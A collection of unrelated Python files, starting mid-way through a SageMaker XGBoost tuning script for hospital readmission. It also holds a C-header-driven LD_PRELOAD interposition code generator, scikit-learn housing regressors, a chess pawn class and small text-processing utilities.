    val_aucs = df_hpo[auc_col].tolist()
    if criteria == "min":
        auc = min(val_aucs)
        idx = val_aucs.index(auc)
    elif criteria == "max":
        auc = max(val_aucs)
        idx = val_aucs.index(auc)
    elif criteria == "avg":
        # Fixed: the original sorted in place (mutating the caller's frame) and
        # then read df_hpo[auc_col][2] by LABEL while params used POSITIONAL
        # indexing, so the AUC and the params could come from different rows.
        # Sort a re-indexed copy and use positional indexing consistently.
        df_hpo = df_hpo.sort_values(auc_col).reset_index(drop=True)
        idx = len(df_hpo) // 2  # median row (index 2 for the usual 5 folds)
        auc = df_hpo[auc_col].iloc[idx]
    else:
        raise ValueError("Error! Invalid criteria: {}".format(criteria))
    # The first 12 columns hold the tunable hyperparameters.
    params = dict(df_hpo.iloc[idx, :12])
    # Cast the params that xgboost requires to be integers.
    int_params = ["max_delta_step", "max_depth", "num_round"]
    for param in int_params:
        params[param] = int(params[param])
    return params, auc
def train_model(
    params,
    container,
    execution_role,
    instance_count,
    instance_type,
    output_path,
    sagemaker_session,
    eval_metric,
    objective,
    scale_pos_weight,
    data_channels,
):
    """
    Train a model based on a given data and xgboost params.
    Args:
        params(dict): Dictionary of params
        container(Object): Xgboost model docker container
        execution_role(Object): Role that enables execution of a training job
        instance_count(int): # of instances for training job
        instance_type(str): Instance type
        output_path(str): Output path
        sagemaker_session(Object): SageMaker session
        eval_metric(str): Evaluation metric
        objective(str): Objective function name
        scale_pos_weight: Class imbalance weight scale
        data_channels(dict): Dictionary of data channels to be used for training
    Returns:
        Output model s3 path
    """
    xgb_model = sagemaker.estimator.Estimator(
        container,
        execution_role,
        instance_count=instance_count,
        instance_type=instance_type,
        output_path=output_path,
        sagemaker_session=sagemaker_session,
    )
    xgb_model.set_hyperparameters(
        eval_metric=eval_metric,
        objective=objective,
        scale_pos_weight=scale_pos_weight,  # For class imbalance
        **params
    )
    # Blocking call: returns when the SageMaker training job finishes.
    xgb_model.fit(inputs=data_channels)
    # NOTE(review): _current_job_name is a private Estimator attribute —
    # confirm it remains available in the pinned sagemaker SDK version.
    job_name = xgb_model._current_job_name
    s3_model_path = os.path.join(output_path, job_name, "output/model.tar.gz")
    return s3_model_path
if __name__ == "__main__":
    # Number of features used for training
    NUM_FEATURES = 200
    FOLDS = ["fold_" + str(i) for i in range(5)]
    DATA_ALL = "all"
    BEST_JOB_CRITERIA = (
        "avg"  # Criteria to select the best training job for final training
    )
    # FOLDS.append(DATA_ALL)
    LABEL = "unplanned_readmission"
    # Local directory layout for preprocessed data and training artifacts.
    ROOT_DIR = "/home/ec2-user/SageMaker/CMSAI/modeling/tes/data/final-global/re/1000/"
    DATA_DIR = os.path.join(ROOT_DIR, "preprocessed")
    TRAIN_DIR = os.path.join(ROOT_DIR, "training")
    # "{}" placeholders are filled with the fold name (or DATA_ALL).
    CLASS_IMBALANCE_PATH_PATTERN = os.path.join(DATA_DIR, "{}", "class_imbalances.json")
    HPO_SUMMARY_PATH_PATTERN = os.path.join(
        TRAIN_DIR, str(NUM_FEATURES), "{}", "hpo_results.csv"
    )
    TRAIN_RESULTS_PATH_PATTERN = os.path.join(
        TRAIN_DIR, str(NUM_FEATURES), "{}", "train_results.csv"
    )
    # Bucket where the trained model is stored
    BUCKET = "cmsai-mrk-amzn"
    # Directory prefix where the model training outputs is saved
    now = strftime("%Y-%m-%d-%H-%M-%S", gmtime())
    DATA_PREFIX = (
        "FinalData/RE/Models/XGBoost/1000/training/data"  # data_split, num_features
    )
    MODEL_PREFIX = "FinalData/RE/Models/XGBoost/1000/training/models"  # data_split, num_features, time
    ###Algorithm config
    ALGORITHM = "xgboost"
    REPO_VERSION = "1.2-1"
    ###HPO/training job config
    TRAIN_INSTANCE_TYPE = "ml.m4.16xlarge"
    TRAIN_INSTANCE_COUNT = 2
    MAX_PARALLEL_JOBS = 4
    MAX_TRAIN_JOBS = 20
    EVALUATION_METRIC = "auc"
    OBJECTIVE = "binary:logistic"
    OBJECTIVE_METRIC_NAME = "validation:auc"
    # Update hyperparameter ranges
    # HYPERPARAMETER_RANGES = {'eta': ContinuousParameter(0, 1),
    #                         'alpha': ContinuousParameter(0, 2),
    #                         'max_depth': IntegerParameter(1, 10)}
    # Search space explored by the SageMaker hyperparameter tuner.
    HYPERPARAMETER_RANGES = {
        "eta": ContinuousParameter(0.1, 0.5),
        "alpha": ContinuousParameter(0, 2),
        "max_depth": IntegerParameter(1, 10),
        "gamma": ContinuousParameter(0, 5),
        "num_round": IntegerParameter(200, 500),
        "colsample_bylevel": ContinuousParameter(0.1, 1.0),
        "colsample_bynode": ContinuousParameter(0.1, 1.0),
        "colsample_bytree": ContinuousParameter(0.5, 1.0),
        "lambda": ContinuousParameter(0, 1000),
        "max_delta_step": IntegerParameter(0, 10),
        "min_child_weight": ContinuousParameter(0, 120),
        "subsample": ContinuousParameter(0.5, 1.0),
    }
    ### SageMaker Initialization
    region = boto3.Session().region_name
    role = sagemaker.get_execution_role()
    smclient = boto3.Session().client("sagemaker")
    sess = sagemaker.Session()
    # Resolve the XGBoost training image URI for this region/version.
    container = retrieve(ALGORITHM, region, version=REPO_VERSION)
    # Phase 1: run one HPO tuning job per cross-validation fold.
    for fold in FOLDS:
        print("Launching HPO tuning job for {}...".format(fold))
        # Prepare the input train & validation data path
        s3_train_path = "s3://{}/{}/{}/{}/train".format(
            BUCKET, DATA_PREFIX, fold, NUM_FEATURES
        )
        s3_val_path = "s3://{}/{}/{}/{}/val".format(
            BUCKET, DATA_PREFIX, fold, NUM_FEATURES
        )
        s3_input_train = sagemaker.inputs.TrainingInput(
            s3_data=s3_train_path, content_type="csv"
        )
        s3_input_validation = sagemaker.inputs.TrainingInput(
            s3_data=s3_val_path, content_type="csv"
        )
        s3_output_path = "s3://{}/{}/{}/{}/{}/output".format(
            BUCKET, MODEL_PREFIX, now, NUM_FEATURES, fold
        )
        # Load class imbalances
        class_imbalance_path = CLASS_IMBALANCE_PATH_PATTERN.format(fold)
        class_imbalances = load_class_imbalances(class_imbalance_path)
        imb = class_imbalances[LABEL]
        scale_pos_weight = float(imb[0]) / imb[1]  # negative/positive
        # For the all-data split there is no held-out set, so train data is
        # reused as the validation channel.
        if fold == DATA_ALL:
            data_channels = {"train": s3_input_train, "validation": s3_input_train}
        else:
            data_channels = {"train": s3_input_train, "validation": s3_input_validation}
        tuner = train_hpo(
            hyperparameter_ranges=HYPERPARAMETER_RANGES,
            container=container,
            execution_role=role,
            instance_count=TRAIN_INSTANCE_COUNT,
            instance_type=TRAIN_INSTANCE_TYPE,
            output_path=s3_output_path,
            sagemaker_session=sess,
            eval_metric=EVALUATION_METRIC,
            objective=OBJECTIVE,
            objective_metric_name=OBJECTIVE_METRIC_NAME,
            max_train_jobs=MAX_TRAIN_JOBS,
            max_parallel_jobs=MAX_PARALLEL_JOBS,
            scale_pos_weight=scale_pos_weight,
            data_channels=data_channels,
        )
        # Get the hyperparameter tuner status at regular interval
        val_auc, best_model_path = get_tuner_status_and_result_until_completion(
            tuner, NUM_FEATURES, LABEL
        )
        # Persist per-fold best result to a local CSV.
        train_results = [[LABEL, NUM_FEATURES, val_auc, best_model_path]]
        train_results_path = TRAIN_RESULTS_PATH_PATTERN.format(fold)
        train_results_dir = os.path.dirname(train_results_path)
        if not os.path.exists(train_results_dir):
            os.makedirs(train_results_dir)
        df_results = pd.DataFrame(
            train_results,
            columns=["class", "num_features", "val_auc", "best_model_path"],
        )
        df_results.to_csv(train_results_path, index=False)
        # Save the HPO tuning job summary data
        job_name = tuner.latest_tuning_job.name
        my_tuner = sagemaker.HyperparameterTuningJobAnalytics(job_name)
        df = my_tuner.dataframe()
        hpo_summary_path = HPO_SUMMARY_PATH_PATTERN.format(fold)
        hpo_summary_dir = os.path.dirname(hpo_summary_path)
        if not os.path.exists(hpo_summary_dir):
            os.makedirs(hpo_summary_dir)
        df.to_csv(hpo_summary_path, index=False)
    print("HPO Trainings Successfully Completed!")
    # TRAINING FOR ALL DATA...
    # Phase 2: retrain once on the full dataset using the best fold params.
    print("Training the final model using all data...")
    # Prepare the input train & validation data path
    s3_train_path = "s3://{}/{}/{}/{}/train".format(
        BUCKET, DATA_PREFIX, DATA_ALL, NUM_FEATURES
    )
    s3_input_train = sagemaker.inputs.TrainingInput(
        s3_data=s3_train_path, content_type="csv"
    )
    s3_output_path = "s3://{}/{}/{}/{}/{}/output".format(
        BUCKET, MODEL_PREFIX, now, NUM_FEATURES, DATA_ALL
    )
    # Load class imbalances
    class_imbalance_path = CLASS_IMBALANCE_PATH_PATTERN.format(DATA_ALL)
    class_imbalances = load_class_imbalances(class_imbalance_path)
    imb = class_imbalances[LABEL]
    scale_pos_weight = float(imb[0]) / imb[1]  # negative/positive
    # No held-out split for the final model: validate on the training channel.
    data_channels = {"train": s3_input_train, "validation": s3_input_train}
    df_hpo, hpo_all_path = get_best_hpo_jobs(HPO_SUMMARY_PATH_PATTERN, FOLDS, DATA_ALL)
    params, val_auc = get_best_params(df_hpo, criteria=BEST_JOB_CRITERIA)
    s3_model_path = train_model(
        params=params,
        container=container,
        execution_role=role,
        instance_count=TRAIN_INSTANCE_COUNT,
        instance_type=TRAIN_INSTANCE_TYPE,
        output_path=s3_output_path,
        sagemaker_session=sess,
        eval_metric=EVALUATION_METRIC,
        objective=OBJECTIVE,
        scale_pos_weight=scale_pos_weight,
        data_channels=data_channels,
    )
    train_results_path = TRAIN_RESULTS_PATH_PATTERN.format(DATA_ALL)
    columns = ["class", "num_features", "val_auc", "best_model_path"]
    results = [[LABEL, NUM_FEATURES, val_auc, s3_model_path]]
    df = pd.DataFrame(results, columns=columns)
    df.to_csv(train_results_path, index=False)
    print("Training Successfully Completed!")
|
"""
Views for Tutorial Page application.
"""
#from django.test import TestCase
# Create your tests here.
|
#!/usr/bin/python
from os.path import splitext, split
from pycparser import c_generator, c_ast, parse_file
from textwrap import dedent
from sys import argv, exit
class InvalidTemplateException(Exception):
    """A template file has been determined to be invalid during parsing.

    Attributes:
        msg: Human-readable description of why the template is invalid.
    """
    def __init__(self, msg):
        # Forward to Exception so that e.args, pickling and generic
        # exception handling behave conventionally (the original never
        # initialized the base class, leaving args empty).
        super(InvalidTemplateException, self).__init__(msg)
        self.msg = msg

    def __str__(self):
        return self.__repr__()

    def __repr__(self):
        return 'Invalid template file: {0}'.format(self.msg)
def audit(message):
    """Print *message* to stdout with the script's '>>> ' audit prefix."""
    prefix = ">>> "
    print("{0}{1}".format(prefix, message))
def group_replace(text, replacements):
    """Apply each (match, replace) pair from *replacements* to *text*, in order.

    Later pairs see the result of earlier substitutions.
    """
    result = text
    for old, new in replacements:
        result = result.replace(old, new)
    return result
class Interpose(object):
    """ Generate and write out code for interposing API calls. The resulting library code can be
        used to intercept API calls for the specified function signatures if it is loaded before
        the original library. On linux, this is achieved with the following variable:
            LD_PRELOAD=/path/to/lib.so
        On OS X, use the following variables:
            DYLD_FORCE_FLAT_NAMESPACE=1 DYLD_INSERT_LIBRARIES=/path/to/lib.dylib
    """
    def __init__(self, dest, header, lib, templates, api):
        # dest: output directory; header: path to the original C header;
        # lib: path to the original library; templates: 'type=filename' specs;
        # api: list of function tuples produced by FuncDeclVisitor.
        self.dest = dest
        self.header = header
        self.lib = lib
        self.api = api
        _, self.header_base = split(self.header)
        self.header_include = self.header_base
        self.header_base = splitext(self.header_base)[0]
        # Map template type -> (input template filename, output filename).
        self.templates = {}
        for t in templates:
            type, name = t.split('=')
            # Second-to-last extension, e.g. '.c' from 'tmpl.c.in'.
            ext = splitext(splitext(name)[0])[1]
            path = 'interpose_{0}_{1}{2}'.format(type, self.header_base, ext)
            self.templates[type] = name, path
        # If the header lives under a system include root, emit the
        # root-relative path in the generated #include directive.
        for i in '/etc/include/', '/usr/include/', '/usr/local/include/', '/opt/local/include/':
            if header.find(i) == 0:
                self.header_include = header[len(i):]
                break

    @staticmethod
    def __extract_label(template, label):
        """ Given the template string, "before{{LABEL:contents}}after", and the label, "LABEL", this
            function would return the tuple ("before", "after", "contents").
        """
        tag = '{{' + label
        loc = template.find(tag)
        if loc == -1:
            # Label not present: whole template is "before", nothing extracted.
            return template, '', ''
        col = template.find(':', loc + len(tag))
        if col == -1:
            end = template.find('}}')
            if end == -1:
                raise InvalidTemplateException("non-terminating '{0}' label".format(label))
            return template[:loc], '', ''
        cut = template[col + 1:]
        # Brace-depth scan; starts at 2 to account for the opening '{{'.
        stack = 2
        c_pos = 0
        found = False
        for c in cut:
            if c == '{':
                stack += 1
            elif c == '}':
                stack -= 1
                if stack == 0:
                    found = True
                    break
            c_pos += 1
        if not found:
            raise InvalidTemplateException("non-terminating '{0}' label".format(label))
        # Adjust for the terminating }} being two characters wide
        return template[:loc], cut[c_pos + 1:], cut[:c_pos - 1]

    def __replace_conditional(self, text, condition, truth):
        # Expand every {{IF_<condition>:...}} block: keep the contents when
        # truth is True, drop them otherwise.
        while True:
            pre, post, extract = Interpose.__extract_label(text, 'IF_' + condition)
            if not extract:
                break
            text = '{0}{1}{2}'.format(pre, extract if truth else '', post)
        return text

    def __generate_code(self, template_file):
        """ Fills out the provided template with this API. """
        template = ''
        with open(template_file, 'r') as f:
            # Global, once-per-file substitutions.
            template = group_replace(
                f.read(),
                (('{{ORIGINAL_HEADER}}', self.header_include),
                 ('{{USER_DEFINED_FUNCTIONS}}', self.templates['usr'][1]),
                 ('{{APPLE_LIB_NAME}}', split(self.lib)[1])))
        # Loop until we've filled all 'FOR_EACH_FUNCTION' templates
        while True:
            template_pre, template_post, label = self.__extract_label(template, 'FOR_EACH_FUNCTION')
            if not label:
                break
            label = label.strip()
            func_group = ''
            # Instantiate the per-function body once for each API function.
            for name, return_type, arg_names, arg_types, arg_list in self.api:
                func_src = label
                func_src = self.__replace_conditional(func_src, 'NONVOID', return_type != 'void')
                func_src = self.__replace_conditional(func_src, 'VOID', return_type == 'void')
                func_src = group_replace(
                    func_src,
                    (('{{NAME}}', name),
                     ('{{RETURN_TYPE}}', return_type),
                     ('{{ARGUMENT_NAMES}}', arg_names),
                     ('{{ARGUMENT_TYPES}}', arg_types),
                     ('{{ARGUMENT_LIST}}', arg_list),
                     # The ',' variants prepend a comma only when non-empty,
                     # so templates can splice extra leading arguments.
                     ('{{,ARGUMENT_NAMES}}', ', ' + arg_names if arg_names else ''),
                     ('{{,ARGUMENT_TYPES}}', ', ' + arg_types if arg_types else ''),
                     ('{{,ARGUMENT_LIST}}', ', ' + arg_list if arg_list else '')))
                func_group += '\n{0}\n'.format(func_src)
            template = '{0}{1}{2}'.format(template_pre, func_group.strip(), template_post)
        return template

    def write(self):
        """ Write the generated code to their respective files. """
        # NOTE(review): dict.iteritems() is Python 2 only — this script
        # appears to target Python 2; use .items() if porting to Python 3.
        for key, value in self.templates.iteritems():
            template_in, template_out = value
            path = '{0}/{1}'.format(self.dest or '.', template_out)
            audit("Writing: {0}".format(path))
            with open(path, 'w') as f:
                f.write(self.__generate_code(template_in))
class CGenerator(c_generator.CGenerator):
    """ Generates C code from an AST. This is modified from the parent class to call _get_name()
        when looking up the node name.
    """
    def _get_name(self, n):
        """ Returns the node name. This was split out from _generate_type() so that it could be
            overridden independently.
        """
        return n.declname or ''

    def _generate_type(self, n, modifiers=[]):
        """ Recursive generation from a type node. n is the type node. 'modifiers' collects the
            PtrDecl, ArrayDecl and FuncDecl modifiers encountered on the way down to a TypeDecl, to
            allow proper generation from it.
        """
        # NOTE(review): the mutable default is never mutated (only
        # `modifiers + [n]` below), so it is safe as written.
        typ = type(n)
        if typ == c_ast.TypeDecl:
            s = ''
            if n.quals: s += ' '.join(n.quals) + ' '
            s += self.visit(n.type)
            nstr = self._get_name(n)
            # Resolve modifiers.
            # Wrap in parens to distinguish pointer to array and pointer to
            # function syntax.
            #
            for i, modifier in enumerate(modifiers):
                if isinstance(modifier, c_ast.ArrayDecl):
                    if (i != 0 and isinstance(modifiers[i - 1], c_ast.PtrDecl)):
                        nstr = '(' + nstr + ')'
                    nstr += '[' + self.visit(modifier.dim) + ']'
                elif isinstance(modifier, c_ast.FuncDecl):
                    if (i != 0 and isinstance(modifiers[i - 1], c_ast.PtrDecl)):
                        nstr = '(' + nstr + ')'
                    nstr += '(' + self.visit(modifier.args) + ')'
                elif isinstance(modifier, c_ast.PtrDecl):
                    if modifier.quals:
                        nstr = '* {0} {1}'.format(' '.join(modifier.quals), nstr)
                    else:
                        nstr = '*' + nstr
            if nstr: s += ' ' + nstr
            return s
        elif typ == c_ast.Decl:
            return self._generate_decl(n.type)
        elif typ == c_ast.Typename:
            return self._generate_type(n.type)
        elif typ == c_ast.IdentifierType:
            return ' '.join(n.names) + ' '
        elif typ in (c_ast.ArrayDecl, c_ast.PtrDecl, c_ast.FuncDecl):
            # Accumulate this modifier and recurse toward the TypeDecl.
            return self._generate_type(n.type, modifiers + [n])
        else:
            return self.visit(n)
class CGeneratorNoNames(CGenerator):
    """ Like the parent class, but uses no names.

    Used to render pure type signatures (e.g. argument type lists) without
    any identifier names.
    """
    # The original defined an __init__ that only called super().__init__();
    # that no-op override is removed — the parent constructor is inherited.

    def _get_name(self, n):
        """ Returns an empty name. """
        return ''
class CGeneratorForceNames(CGenerator):
    """ Like the parent class, but forces names, even when none are defined. """
    def __init__(self):
        super(CGeneratorForceNames, self).__init__()
        # 1-based running count of names requested so far.
        self.index = 0

    def _get_name(self, n):
        """ Returns the node name or 'argN', where N is the 1-based argument index. """
        self.index += 1
        if n.declname:
            return n.declname
        return 'arg{0}'.format(self.index)
def generate_names(args):
    """ Yield names for the arguments, forcing 'argN' (where N is the 1-based argument index) when
        an argument has no name.
    """
    for position, (_, decl) in enumerate(args, start=1):
        yield decl.name or 'arg{0}'.format(position)
class FuncDeclVisitor(c_ast.NodeVisitor):
    """ Walks every function declaration in the provided AST, appending each to a list. """
    def __init__(self):
        super(FuncDeclVisitor, self).__init__()
        # Collected function signature tuples (see visit_Decl docstring).
        self.functions = []

    def visit_Decl(self, node):
        """ For each encountered function declaration, this function records the following tuple:
            [0] function name
            [1] return type
            [2] comma-delimited argument names
            [3] comma-delimited argument types
            [4] comma-delimited argument names and types
        """
        if type(node.type) == c_ast.FuncDecl:
            func_name = node.name
            return_type = CGeneratorNoNames()._generate_type(node.type.type)
            arg_types = CGeneratorNoNames().visit(node.type.args) if node.type.args else ''
            # A lone 'void' argument list means "takes no arguments".
            if arg_types == 'void':
                arg_types = ''
            arg_names = ', '.join(generate_names(node.type.args.children())) if arg_types else ''
            arg_list = CGeneratorForceNames().visit(node.type.args) if arg_types else ''
            self.functions.append((func_name, return_type, arg_names, arg_types, arg_list))
def parse_header(filename):
    """ Parse the specified C header file and return a list of functions per FuncDeclVisitor. """
    ast = parse_file(filename, use_cpp = True)
    collector = FuncDeclVisitor()
    collector.visit(ast)
    return collector.functions
def main(args):
    """ Drive template generation from the command-line arguments.

    Returns 0 on success, 1 when a template file is invalid.
    """
    try:
        dest = args[1]
        header = args[2]
        lib = args[3]
        templates = args[4:]
        api = parse_header(header)
        interpose = Interpose(dest, header, lib, templates, api = api)
        interpose.write()
    except InvalidTemplateException as e:
        audit('[ERROR] {0}'.format(e))
        return 1
    else:
        return 0
if __name__ == "__main__":
    # Exit with main()'s return code (0 on success, 1 on template errors).
    exit(main(argv))
|
"""Main.py."""
# import os
# import tarfile
# import subprocess
import pprint
# import pandas as pd
# import matplotlib.pyplot as plt
import numpy as np
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import cross_val_score
from sklearn.tree import DecisionTreeRegressor
from sklearn.ensemble import RandomForestRegressor
from sklearn.externals import joblib
from sklearn.model_selection import GridSearchCV
from prepared import training_data, test_data
# Load the preprocessed training matrix/labels and the held-out test split
# at import time (side effect of importing this module).
housing_prepared, housing_labels = training_data()
strat_test_set = test_data()  # NOTE(review): not used in this module — confirm
def display_scores(scores, text_=''):
    """Print a labelled summary of cross-validation scores.

    Args:
        scores: Array-like of scores (must support .mean() and .std(),
            e.g. a numpy array returned by cross_val_score).
        text_: Optional label printed above the scores.
    """
    print('\n\n------------------------------------')
    print(text_)
    print('Scores:', scores)  # fixed typo: was 'Scoress:'
    print('Mean:', scores.mean())
    print('Standard deviation:', scores.std())  # fixed typo: was 'Standred deviation:'
    print('\n\n')
# Training and Evaluating on the Training set
# Better Evaluation Using Cross-Validation
def decisiontreeregressor(prepared, labels):
    """Fit a DecisionTreeRegressor, persist it, and report 10-fold CV RMSE."""
    model = DecisionTreeRegressor()
    model.fit(prepared, labels)
    joblib.dump(model, 'models/DecisionTreeRegressor.pkl')
    cv_scores = cross_val_score(model, prepared, labels,
                                scoring="neg_mean_squared_error", cv=10)
    rmse_scores = np.sqrt(-cv_scores)
    display_scores(rmse_scores, text_="DecisionTreeRegressor")
def linearregression(prepared, labels):
    """Fit a LinearRegression model, persist it, and report 10-fold CV RMSE."""
    model = LinearRegression()
    model.fit(prepared, labels)
    joblib.dump(model, "models/Linearregression.pkl")
    cv_scores = cross_val_score(model, prepared, labels,
                                scoring="neg_mean_squared_error", cv=10)
    rmse_scores = np.sqrt(-cv_scores)
    display_scores(rmse_scores, text_="LinearRegression")
def randomforestregressor(prepared, labels):
    """Fit a RandomForestRegressor, persist it, and report 10-fold CV RMSE."""
    model = RandomForestRegressor()
    model.fit(prepared, labels)
    joblib.dump(model, 'models/RandomForestRegressor.pkl')
    cv_scores = cross_val_score(model, prepared, labels,
                                scoring="neg_mean_squared_error", cv=10)
    rmse_scores = np.sqrt(-cv_scores)
    display_scores(rmse_scores, text_='RandomForestRegressor')
# Grid Search
def grid_search(prepared, labels):
    """Exhaustively tune RandomForestRegressor hyper-parameters with 5-fold CV.

    Prints the best parameters/estimator and per-candidate RMSE, then
    returns the fitted GridSearchCV object.
    """
    param_candidates = [
        {'n_estimators': [3, 10, 30], 'max_features': [2, 4, 6, 8]},
        {'bootstrap': [False], 'n_estimators': [3, 10], 'max_features': [2, 3, 4]},
    ]
    estimator = RandomForestRegressor()
    searcher = GridSearchCV(estimator, param_candidates, cv=5,
                            scoring='neg_mean_squared_error')
    searcher.fit(prepared, labels)
    print('best_params_')
    pprint.pprint(searcher.best_params_)
    print('best_estimator_')
    pprint.pprint(searcher.best_estimator_)
    results = searcher.cv_results_
    for mean_score, candidate in zip(results['mean_test_score'], results['params']):
        print(np.sqrt(-mean_score), candidate)
    return searcher
if __name__ == "__main__":
    # NOTE(review): the result rebinds the module-level name `grid_search`,
    # shadowing the function of the same name after this call.
    grid_search = grid_search(prepared=housing_prepared, labels=housing_labels)
    joblib.dump(grid_search.best_estimator_, 'models/final.pkl')
|
# Append a line to example.txt. A `with` block guarantees the handle is
# flushed and closed even if the write raises (the original leaked the
# handle on error by calling close() manually).
with open("example.txt", 'a') as file:
    file.write("Line 4\n")
# open() modes: r, w, a and r+, w+, a+ — see the io module docs.
|
from .piece import Piece
from game_rules import can_move
from game_state import GameState
import os
class Pawn(Piece):
    """Pawn chess piece: forward moves, diagonal captures and en passant."""
    # add boundary checking functions
    def __init__(self, color, name):
        # Sprite filename is derived from the piece color.
        self.sprite_dir = color + "Pawn.png"
        self.name = name
        self.color=color
        super(Pawn,self).__init__(color,name)

    def get_possible_moves(self, coord, matrix):
        """Return the pawn's legal moves from `coord` on board `matrix`.

        When can_move() returns a restriction list (e.g. the king is in
        check), only moves present in both lists are returned.
        """
        list_aux = can_move(self.color, matrix, coord)
        self.possible_moves=[]
        self.mov_d(coord, matrix)
        self.mov_v(coord, matrix)
        if (GameState.possible_en_passant):
            self.check_en_passant(coord, matrix)
        ###print("possible_moves", self.possible_moves)
        ###print("list_aux", list_aux)
        if (list_aux):
            # NOTE(review): original comment said this was failing when the
            # pawn is two attacking moves away from the king — confirm.
            return [move for move in list_aux if move in self.possible_moves]
        return self.possible_moves

    def mov_v(self, coord, matrix):
        # Vertical (non-capturing) moves; direction depends on color.
        ######print(first_move)
        if (self.color == 'white'):
            self.check_upper_edge(coord, matrix)
        else:
            self.check_lower_edge(coord, matrix)

    def mov_d(self, coord, matrix):
        # Diagonal capture moves; direction depends on color.
        ######print(first_move)
        if (self.color == 'white'):
            self.check_upper_left_edge(coord, matrix)
            self.check_upper_right_edge(coord, matrix)
        else:
            self.check_lower_left_edge(coord, matrix)
            self.check_lower_right_edge(coord, matrix)

    def check_en_passant(self, coord, matrix):
        # Add an en passant capture if the opposing pawn that just moved two
        # squares sits directly left or right of this pawn.
        if (coord[1]-1>=0 and (coord[0], coord[1]-1) == GameState.possible_en_passant):
            if matrix[coord]['piece'].color == 'white':
                self.possible_moves.append((coord[0]-1, coord[1]-1, 'mov'))
            else:
                self.possible_moves.append((coord[0]+1, coord[1]-1, 'mov'))
        elif (coord[1]+1<=7 and (coord[0], coord[1]+1) == GameState.possible_en_passant):
            if matrix[coord]['piece'].color =='white':
                self.possible_moves.append((coord[0]-1, coord[1]+1, 'mov'))
            else:
                self.possible_moves.append((coord[0]+1, coord[1]+1, 'mov'))

    def check_upper_edge(self, coord, matrix):
        # White forward moves (row index decreases). On the first move, the
        # loop re-checks the one-square move as well as the two-square move.
        # NOTE(review): this appends the one-square move a second time when
        # the pawn has not moved — confirm duplicates are harmless upstream.
        if (coord[0]-1>=0):
            front_piece = matrix[(coord[0]-1,coord[1])]['piece']
            if (not front_piece):
                self.possible_moves.append((coord[0]-1,coord[1],'mov'))
                if not self.was_moved_before:
                    i=0
                    while(i<2):
                        if(coord[0]-(i+1)>=0):  # upper board limit
                            front_piece = matrix[(coord[0]-(i+1),coord[1])]['piece']  # ⬆⬆⬆
                            if (not front_piece):
                                self.possible_moves.append((coord[0]-(i+1),coord[1],'mov'))
                                i+=1
                            else:
                                i=2
                        else:
                            i=2

    def check_lower_edge(self, coord, matrix):
        # Black forward moves (row index increases); mirror of the above.
        if (coord[0]+1<=7):
            bottom_piece = matrix[(coord[0]+1,coord[1])]['piece']
            if (not bottom_piece):
                self.possible_moves.append((coord[0]+1,coord[1],'mov'))
                if (not self.was_moved_before):
                    i=0
                    while(i<2):
                        if(coord[0]+(i+1)<=7):  # lower board limit
                            front_piece=matrix[(coord[0]+(i+1),coord[1])]['piece']  # ⬇⬇⬇
                            if (not front_piece):
                                self.possible_moves.append((coord[0]+(i+1),coord[1],'mov'))
                                i+=1
                            else:
                                i=2
                        else:
                            i=2

    def check_upper_right_edge(self, coord, matrix):
        # White capture toward the upper-right diagonal.
        if (coord[1]!=7 and coord[0]!=0):
            front_right_piece = matrix[(coord[0]-1,coord[1]+1)]['piece']
            if (front_right_piece and front_right_piece.color != self.color):
                self.possible_moves.append((coord[0]-1,coord[1]+1,'mov'))

    def check_upper_left_edge(self, coord, matrix):
        # White capture toward the upper-left diagonal.
        if (coord[1]!=0 and coord[0]!=0):
            front_left_piece = matrix[(coord[0]-1,coord[1]-1)]['piece']
            if (front_left_piece and front_left_piece.color != self.color):
                self.possible_moves.append((coord[0]-1,coord[1]-1,'mov'))

    def check_lower_right_edge(self, coord, matrix):
        # Black capture toward the lower-right diagonal.
        if (coord[1]!=7 and coord[0]!=7):
            bottom_right_piece = matrix[(coord[0]+1,coord[1]+1)]['piece']
            if (bottom_right_piece and bottom_right_piece.color != self.color):
                self.possible_moves.append((coord[0]+1,coord[1]+1,'mov'))

    def check_lower_left_edge(self, coord, matrix):
        # Black capture toward the lower-left diagonal.
        if (coord[1]!=0 and coord[0]!=7):
            bottom_left_piece = matrix[(coord[0]+1,coord[1]-1)]['piece']
            if(bottom_left_piece and bottom_left_piece.color != self.color):
                self.possible_moves.append((coord[0]+1,coord[1]-1,'mov'))
# Author : Xiang Xu
# -*- coding: utf-8 -*-
def getCheckinTimes(infile, outfile):
    """Write one 'uid<TAB>count' line per user to *outfile*.

    Assumes *infile* is grouped (sorted) by user id, one tab-separated
    check-in record per line with the user id in the first column.

    Args:
        infile: Path of the input check-in file.
        outfile: Path of the output counts file (overwritten).
    """
    # `with` closes both handles even on error (the original leaked them
    # if an exception occurred mid-loop).
    with open(infile, 'r') as inf, open(outfile, 'w') as outf:
        uid = ''
        count = 0
        outline = ''
        for line in inf:
            token = line.strip().split('\t')
            if token[0] != uid:
                # New user: flush the previous user's count (if any).
                if outline:
                    outf.write(outline + str(count) + '\n')
                uid = token[0]
                count = 1
                outline = uid + '\t'
            else:
                count += 1
        # Flush the final user; guard fixes the original writing a bogus
        # '0' row when the input file is empty.
        if outline:
            outf.write(outline + str(count) + '\n')
def getFriends(infile, outfile):
    """Write one 'uid<TAB>friend1 friend2 ...' line per user to *outfile*.

    Assumes *infile* is grouped (sorted) by user id, one tab-separated
    edge (uid, friend_id) per line.

    Args:
        infile: Path of the input edge list.
        outfile: Path of the output adjacency file (overwritten).
    """
    # `with` closes both handles even on error.
    with open(infile, 'r') as inf, open(outfile, 'w') as outf:
        uid = ''
        outline = ''
        for line in inf:
            token = line.strip().split('\t')
            if token[0] != uid:
                # New user: flush the previous user's friend list (if any).
                if outline:
                    outf.write(outline + '\n')
                uid = token[0]
                outline = (uid + '\t' + token[1])
            else:
                outline += (' ' + token[1])
        # Flush the final user; guard fixes the original writing a bare
        # newline when the input file is empty.
        if outline:
            outf.write(outline + '\n')
if __name__ == '__main__':
    # Aggregate the Gowalla dataset: per-user check-in counts, then
    # per-user friend adjacency lists.
    getCheckinTimes('Gowalla_totalCheckins.txt', 'checkintimes.txt')
    getFriends('Gowalla_edges.txt', 'friends.txt')
|
# Print all the words that appear in the text, one for each
# line. Words should be sorted in descending order of the
# number of occurrences in the text (ties broken alphabetically).
with open('input.txt') as inFile:
    myFile = inFile.readlines()

# word -> occurrence count
myDict = {}
for line in myFile:
    for word in line.split():
        myDict[word] = myDict.get(word, 0) + 1

# Removed the unused `ans`/`ans1` locals from the original.
sorted_dict = sorted(myDict, key=lambda x: (-myDict[x], x))
print('\n'.join(sorted_dict))
|
